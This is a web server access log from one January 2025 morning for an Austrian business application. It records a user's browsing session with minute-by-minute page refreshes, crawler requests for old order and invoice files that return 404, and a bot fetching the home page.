46.19.138.234 - - [03/Jan/2025:09:39:58 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [03/Jan/2025:09:41:48 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202104281203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Jan/2025:09:45:48 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201912161003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Jan/2025:09:49:47 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202004271203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Jan/2025:09:53:48 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103311403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Jan/2025:09:57:48 +0100] "GET /docs/ecommlogistics/belege/RE2016.PDF HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.191.42 - - [03/Jan/2025:10:04:47 +0100] "GET /layout.php HTTP/1.1" 200 815 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:04:47 +0100] "GET /gui/javascript/form_form.js HTTP/1.1" 304 - "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:04:47 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:04:47 +0100] "GET /entry.php?id=11412 HTTP/1.1" 200 1759 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:04:47 +0100] "GET /entry.php?id=10270 HTTP/1.1" 200 909 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:04:47 +0100] "GET /entry.php?id=10272 HTTP/1.1" 200 1159 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:04:47 +0100] "GET /entry.php?id=10273 HTTP/1.1" 200 1902 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:04:47 +0100] "GET /gui/javascript/jquery/css/gui-themes/custom.min.css HTTP/1.1" 200 5618 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:04:47 +0100] "GET /framework/webfx/javascript/statusbar/statusBar.js HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:04:47 +0100] "GET /gui/javascript/form_form.js?1735895087 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:04:47 +0100] "GET /gui/javascript/form_form.js?1735895087 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:04:47 +0100] "GET /gui/javascript/form_form.js?1735895087 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:04:47 +0100] "GET /gui/images/icons/cancel.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:04:47 +0100] "GET /gui/javascript/form_form.js?1735895087 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:04:47 +0100] "GET /entry.php?id=10287 HTTP/1.1" 200 2410 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:04:48 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 935 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:04:48 +0100] "GET /gui/images/emptybar.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:04:48 +0100] "GET /gui/javascript/form_form.js?1735895088 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:04:48 +0100] "GET /gui/javascript/form_form.js?1735895088 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:04:48 +0100] "GET /entry.php?id=10273& HTTP/1.1" 200 1903 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:04:48 +0100] "GET /entry.php?id=10270& HTTP/1.1" 200 909 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:04:52 +0100] "POST /entry.php?id=10287& HTTP/1.1" 200 1967 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:05:55 +0100] "GET /gui/javascript/form_form.js?1735895155 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:05:55 +0100] "GET /entry.php?id=10273& HTTP/1.1" 200 2013 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:05:56 +0100] "GET /gui/javascript/form_form.js?1735895156 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:05:56 +0100] "GET /entry.php?id=10270&__app__=10006038 HTTP/1.1" 200 2231 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:05:55 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:05:56 +0100] "GET /framework/webfx/javascript/navigation/crossbrowser.js HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:05:56 +0100] "GET /framework/webfx/javascript/navigation/outlook.js HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:05:56 +0100] "GET /gui/images/icons/pers_einstellungen.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:05:56 +0100] "GET /gui/images/icons/i_lagertransaktion.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:05:56 +0100] "GET /gui/images/icons/i_artikelgruppen.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:05:56 +0100] "GET /gui/images/icons/i_artikel.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:05:56 +0100] "GET /gui/images/icons/grundlagen.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:05:56 +0100] "GET /gui/images/icons/rechnungswesen_einstellungen.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:05:56 +0100] "GET /gui/images/icons/lager.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:05:56 +0100] "GET /gui/images/icons/person.png HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:05:56 +0100] "GET /gui/images/icons/i_einzelbestellung.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:05:56 +0100] "GET /gui/images/icons/i_aktionen.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:05:56 +0100] "GET /gui/images/icons/menumanagement.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:05:56 +0100] "GET /gui/images/icons/verwaltung_automarken.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:05:56 +0100] "GET /gui/images/icons/i_aktionstypen.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:05:56 +0100] "GET /gui/images/icons/artikelbearbeitung_verfassung.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:05:56 +0100] "GET /gui/images/icons/default_item.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:05:56 +0100] "GET /gui/images/icons/i_resourcenverwaltung.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:05:56 +0100] "GET /gui/images/icons/lagerstandorte.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:05:56 +0100] "GET /framework/icons/navigation/arrowdown.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:05:56 +0100] "GET /framework/icons/navigation/arrowup.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:05:56 +0100] "GET /undefined HTTP/1.1" 404 289 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:05:56 +0100] "GET /framework/webfx/style/toolbar/images/cbback.gif HTTP/1.1" 404 318 "http://hausegger.activities.at/framework/webfx/style/toolbar/cb2.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:06:56 +0100] "GET /entry.php?id=10271&&ser=895156 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:06:56 +0100] "GET /gui/javascript/form_form.js?1735895216 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=895156" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:07:56 +0100] "GET /entry.php?id=10271&&ser=895216 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=895156" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:07:56 +0100] "GET /gui/javascript/form_form.js?1735895276 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=895216" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
68.183.199.105 - - [03/Jan/2025:10:08:12 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible)"
68.183.199.105 - - [03/Jan/2025:10:08:13 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "http://webmail.creativecube.at/" "Mozilla/5.0 (compatible)"
68.183.199.105 - - [03/Jan/2025:10:08:13 +0100] "GET /ads.txt HTTP/1.1" 404 289 "-" "Mozilla/5.0 (compatible)"
178.165.191.42 - - [03/Jan/2025:10:08:56 +0100] "GET /entry.php?id=10271&&ser=895276 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=895216" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:08:57 +0100] "GET /gui/javascript/form_form.js?1735895337 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=895276" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:10:02 +0100] "GET /entry.php?id=10271&&ser=895337 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=895276" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:10:03 +0100] "GET /gui/javascript/form_form.js?1735895403 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=895337" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:11:03 +0100] "GET /entry.php?id=10271&&ser=895403 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=895337" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:11:03 +0100] "GET /gui/javascript/form_form.js?1735895463 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=895403" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:12:03 +0100] "GET /entry.php?id=10271&&ser=895463 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=895403" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:12:03 +0100] "GET /gui/javascript/form_form.js?1735895523 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=895463" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:13:03 +0100] "GET /entry.php?id=10271&&ser=895523 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=895463" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:13:04 +0100] "GET /gui/javascript/form_form.js?1735895583 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=895523" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:14:04 +0100] "GET /entry.php?id=10271&&ser=895583 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=895523" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:14:04 +0100] "GET /gui/javascript/form_form.js?1735895644 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=895583" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:15:04 +0100] "GET /entry.php?id=10271&&ser=895644 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=895583" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:15:04 +0100] "GET /gui/javascript/form_form.js?1735895704 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=895644" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:16:04 +0100] "GET /entry.php?id=10271&&ser=895704 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=895644" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:16:04 +0100] "GET /gui/javascript/form_form.js?1735895764 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=895704" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:17:05 +0100] "GET /entry.php?id=10271&&ser=895764 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=895704" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:17:05 +0100] "GET /gui/javascript/form_form.js?1735895825 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=895764" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:18:05 +0100] "GET /entry.php?id=10271&&ser=895825 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=895764" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:18:05 +0100] "GET /gui/javascript/form_form.js?1735895885 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=895825" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:19:05 +0100] "GET /entry.php?id=10271&&ser=895885 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=895825" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:19:05 +0100] "GET /gui/javascript/form_form.js?1735895945 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=895885" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:20:05 +0100] "GET /entry.php?id=10271&&ser=895945 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=895885" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:20:06 +0100] "GET /gui/javascript/form_form.js?1735896006 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=895945" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:21:06 +0100] "GET /entry.php?id=10271&&ser=896006 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=895945" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:21:06 +0100] "GET /gui/javascript/form_form.js?1735896066 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=896006" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
156.59.198.136 - - [03/Jan/2025:10:21:51 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00014.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.191.42 - - [03/Jan/2025:10:22:06 +0100] "GET /entry.php?id=10271&&ser=896066 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=896006" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:22:06 +0100] "GET /gui/javascript/form_form.js?1735896126 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=896066" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:23:06 +0100] "GET /entry.php?id=10271&&ser=896126 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=896066" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:23:07 +0100] "GET /gui/javascript/form_form.js?1735896186 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=896126" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:24:07 +0100] "GET /entry.php?id=10271&&ser=896186 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=896126" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:24:07 +0100] "GET /gui/javascript/form_form.js?1735896247 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=896186" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:25:07 +0100] "GET /entry.php?id=10271&&ser=896247 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=896186" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:25:07 +0100] "GET /gui/javascript/form_form.js?1735896307 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=896247" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
156.59.198.136 - - [03/Jan/2025:10:25:51 +0100] "GET /renault.2web.at/stats/lang/awstats-mk.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.191.42 - - [03/Jan/2025:10:26:07 +0100] "GET /entry.php?id=10271&&ser=896307 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=896247" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [03/Jan/2025:10:26:07 +0100] "GET /gui/javascript/form_form.js?1735896367 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=896307" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
